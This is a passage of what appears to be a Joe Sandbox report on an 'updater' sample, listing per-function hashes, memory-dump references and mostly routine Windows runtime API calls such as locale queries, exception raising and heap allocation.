                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 7019240afb76a594433f7a5290fcc686f0c469133e66db1701f0439a03a05587
                                  • Instruction ID: 8a323b45217aafe97f22b4b720b52648245e8b21966b664a153bc9d3f58b5560
                                  • Opcode Fuzzy Hash: 7019240afb76a594433f7a5290fcc686f0c469133e66db1701f0439a03a05587
                                  • Instruction Fuzzy Hash: 4731D87490122D9BCB22DF69D888BCDBBB4BF18310F9045EAE51CA7260E7749BC58F44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$LoadLockSizeof
                                  • String ID:
                                  • API String ID: 2853612939-0
                                  • Opcode ID: 6ceed8ebed73cb5bb5be72f0beba49fd4f93063fbb78657191876536ce909529
                                  • Instruction ID: b0179324530ed69ff9558147c0e7793b372843f8972d5b171626d85573d94c8f
                                  • Opcode Fuzzy Hash: 6ceed8ebed73cb5bb5be72f0beba49fd4f93063fbb78657191876536ce909529
                                  • Instruction Fuzzy Hash: 76F0F67790022597DB310B5D9C5886BBBACDBD4A2A305092EFD45D7115EB70DC9083B0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
                                  • Instruction ID: f689548d0deaf80aea6ad9c34298496f33565c89462d4563f05504f4dcd76566
                                  • Opcode Fuzzy Hash: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
                                  • Instruction Fuzzy Hash: B4F16071E002299FDF14CFA8C8806AEFBB1FF88314F65826AD919E7751D730A941CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLocaleInfoEx.KERNEL32(?,?,0141D265,?,00000022,00000000,00000002,?,?,01412908,00000004,0140CD4E,?,00000004,0140E352,00000000), ref: 0141D5AC
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,?,?,?,0141D265,?,00000022,00000000,00000002,?,?,01412908,00000004,0140CD4E), ref: 0141D5B7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 935a878d32f2674218e3294fb8eda030a58431c861fbc3757d068d469fa06a1f
                                  • Instruction ID: 2c3a70ba0a4fde667412224918f09e03ceef2381c2c9e96c8bbf30525c834a71
                                  • Opcode Fuzzy Hash: 935a878d32f2674218e3294fb8eda030a58431c861fbc3757d068d469fa06a1f
                                  • Instruction Fuzzy Hash: 27E08C76900138EB8F122FD9EC0C8AE3F2AFF046657040006FA0916238CB3299209BD5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,014353BF,?,?,00000008,?,?,0143EF09,00000000), ref: 014355F1
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID:
                                  • API String ID: 3997070919-0
                                  • Opcode ID: 6847f40d2673af159ac1ced19a78da6bacca1c8687b668ad19e76648e6e2dd8e
                                  • Instruction ID: fcd759b64af90fd2541ea8d51486ef6d9ca19e72c19d7f9a2a0c551c6d4f6805
                                  • Opcode Fuzzy Hash: 6847f40d2673af159ac1ced19a78da6bacca1c8687b668ad19e76648e6e2dd8e
                                  • Instruction Fuzzy Hash: A0B15B312106049FE719CF2CC486B657BA1FF89365F258659E99ACF3B1C335E992CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0141E68E
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  • Opcode ID: 0364c88558fc5fb802577a269e05dc76b5f47fdd845cc1075357e79d753a6712
                                  • Instruction ID: 942fdefca8f3d95d6a16a4d0b4b892bc179030eba4eb5173a2d626d9c64cfa66
                                  • Opcode Fuzzy Hash: 0364c88558fc5fb802577a269e05dc76b5f47fdd845cc1075357e79d753a6712
                                  • Instruction Fuzzy Hash: 2F51ADB6E012058BEB2ACF59D891BAABBF1FB08314F14806BD915EB368D3749900CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                    • Part of subcall function 0143049B: _free.LIBCMT ref: 014304FD
                                    • Part of subcall function 0143049B: _free.LIBCMT ref: 01430533
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0143AFEC
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free$InfoLocale
                                  • String ID:
                                  • API String ID: 2003897158-0
                                  • Opcode ID: b249f32d7506c43081f991e4d4b63e1ee91fbe7dfa89d1f8bbbe0af8dda2d73a
                                  • Instruction ID: ec8ab6c397af49fdc671b0cbe7bcf9a5eb94721d342f657f978bf602b6c4fa4c
                                  • Opcode Fuzzy Hash: b249f32d7506c43081f991e4d4b63e1ee91fbe7dfa89d1f8bbbe0af8dda2d73a
                                  • Instruction Fuzzy Hash: C421C8B1504206ABEB289F29DC41F7BB3B8EF99310F10407FEA11D6261EB74D9418B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                  • EnumSystemLocalesW.KERNEL32(0143AD45,00000001,00000000,?,-00000050,?,0143B373,00000000,?,?,?,00000055,?), ref: 0143AC91
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: bfcfc067c44c08d9689fc4c7bd9e8447274922f0f6aa8fc86765a529d50e06ec
                                  • Instruction ID: 5137ca3fd2f6060ffa398fbba7b6308f2a30a0703f22a809bae787cbd8866244
                                  • Opcode Fuzzy Hash: bfcfc067c44c08d9689fc4c7bd9e8447274922f0f6aa8fc86765a529d50e06ec
                                  • Instruction Fuzzy Hash: 1811253A2007055FDB189F39C8A55BAB792FFC8319B24452EE98787B50E771B903CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0143AF61,00000000,00000000,?), ref: 0143B1F0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  • Opcode ID: 24ce53f12d4e6eacf96ad78c9b63e2326db29054d1f4c0428fda684b500f117f
                                  • Instruction ID: 1d507622f3dac510fe08b623452c289d37e38bc92a3b5fe904aba3289ab3b632
                                  • Opcode Fuzzy Hash: 24ce53f12d4e6eacf96ad78c9b63e2326db29054d1f4c0428fda684b500f117f
                                  • Instruction Fuzzy Hash: 82F02D36A00112BBEB385B25D80DBBF7B64EBC4354F14092AED02E7250DA30FE42C690
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                  • EnumSystemLocalesW.KERNEL32(0143AF98,00000001,00000000,?,-00000050,?,0143B337,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0143AD04
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 14ecdff8013c6c97d48232ccc371496e77a41afab75f58fbec0a3e1f85c4a918
                                  • Instruction ID: cf1ed208693dddcb9e9aaf1358500bf6054ea0757bef60ff1da277d743030d21
                                  • Opcode Fuzzy Hash: 14ecdff8013c6c97d48232ccc371496e77a41afab75f58fbec0a3e1f85c4a918
                                  • Instruction Fuzzy Hash: 91F046362403051FDB249F39D884A7ABB91EFC4328B24442EFA828B6A0C6719802C750
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0142703F: EnterCriticalSection.KERNEL32(?,?,01437562,?,014603C8,0000000C), ref: 0142704E
                                  • EnumSystemLocalesW.KERNEL32(0142F7E2,00000001,014601A0,0000000C,0142FC0D,00000000), ref: 0142F827
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: c3cef8afcabbcd153817777544a6204caa838ecf59d4fb6fa4dd480f50345ebe
                                  • Instruction ID: cabaa7aabfcd81da5a40e2a4c7054491da8f89e843a5890ab879122703c711c8
                                  • Opcode Fuzzy Hash: c3cef8afcabbcd153817777544a6204caa838ecf59d4fb6fa4dd480f50345ebe
                                  • Instruction Fuzzy Hash: 27F04F76A40211DFDB10DF99D441B9CB7F1EB24725F60412FE415E72B0C7B56944CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                  • EnumSystemLocalesW.KERNEL32(0143AB2D,00000001,00000000,?,?,0143B395,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0143AC0B
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 8833a4b11a8891a64dba3541767536eadd8c9c6815cc52a5f8aabafbfc48ac20
                                  • Instruction ID: 60bc635fae7e5a3e778f3b692cd7b4976144400c435a406444768e9b30749a2c
                                  • Opcode Fuzzy Hash: 8833a4b11a8891a64dba3541767536eadd8c9c6815cc52a5f8aabafbfc48ac20
                                  • Instruction Fuzzy Hash: C4F0553A34020557CB18AF3AD849A6ABF95EFC5620B16406EFB06CB260C2319843C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetVersionExA.KERNEL32(?), ref: 013E2F80
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Version
                                  • String ID:
                                  • API String ID: 1889659487-0
                                  • Opcode ID: fb2d0ee3ad173cfbaa7256b2a8ed4bdaa5aec8769a170d86a860486cbc20e817
                                  • Instruction ID: cd19852448a02c323275246f3b163687a9959d65c027238584e13b6f882f6007
                                  • Opcode Fuzzy Hash: fb2d0ee3ad173cfbaa7256b2a8ed4bdaa5aec8769a170d86a860486cbc20e817
                                  • Instruction Fuzzy Hash: 60E086795053144FEF389B34A609B1A77E8A70860CF0000ADC50BD2192D7349549CB01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
                                  • Instruction ID: e81392808358a07960ccc07332abf75dc507e002f8d60ace9e013700dfbf204b
                                  • Opcode Fuzzy Hash: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
                                  • Instruction Fuzzy Hash: CB51B93030463856EB388A7D88957BFAF99DB62200FCC001FD643DB3B1C67199C68659
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • GetProcessHeap.KERNEL32(?,00000000,013DDD2B,80070216,?,?,?,?,00000000,?,?,?,013C4770,?,00000003,00000000), ref: 013C4481
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                  • String ID:
                                  • API String ID: 325507722-0
                                  • Opcode ID: d316b687ad7ad708fd6eddf02358ff2f08fb80e381be517ca02b53356ae79111
                                  • Instruction ID: cd2df4fe43498f88b459e91f2edc414bf10bb9b7838e20c285e89afe36bc5537
                                  • Opcode Fuzzy Hash: d316b687ad7ad708fd6eddf02358ff2f08fb80e381be517ca02b53356ae79111
                                  • Instruction Fuzzy Hash: 3711BCB1608240CBDA34ABA9F84871933A5A76067FF28010FE010CB2B8C7795841CB12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
                                  • Instruction ID: 6b10d39cb8cbec30fde16a523ec0728cfdb3ccec653ef95a74247ac1a38b1485
                                  • Opcode Fuzzy Hash: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
                                  • Instruction Fuzzy Hash: 9E2282B7F515144BDB0CCA5DCCA23ECB2E3AFD4218B0E813DA90AE3745EA7DD9158684
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 280ef415a64cce27c24b2fe8d290cf29b277306fbeba8217d51b082f2eb57832
                                  • Instruction ID: fd295ae81546bc7d48b7010190859f32126c1cfc9c5c257918a6ca58c58b18cb
                                  • Opcode Fuzzy Hash: 280ef415a64cce27c24b2fe8d290cf29b277306fbeba8217d51b082f2eb57832
                                  • Instruction Fuzzy Hash: 2032A074A0022ACFCB24CF5CC9D1ABEBBB5EF45304F54416EDD45A7365D632AA86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49bd7c0f442a287df14438af327f5789ccb0975b18f94941b029eb957485bd69
                                  • Instruction ID: 76035ea4a53814b2700cef0583ad516dcb52abbf5b43d8c245e1700595a3cf5d
                                  • Opcode Fuzzy Hash: 49bd7c0f442a287df14438af327f5789ccb0975b18f94941b029eb957485bd69
                                  • Instruction Fuzzy Hash: A1321661D25F425DD7279638D8223366648AFBB3C4F16D737F819B5ABAEB38C1834200
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
                                  • Instruction ID: d4147e5782d0dd5bdce54bdf4037e30c4da827a359616a7e999e1d781b98e9b5
                                  • Opcode Fuzzy Hash: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
                                  • Instruction Fuzzy Hash: 5A026E75E0032A9FDB15DF6CC494BADBBF6AF88218F144069D905AB391EB31ED41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
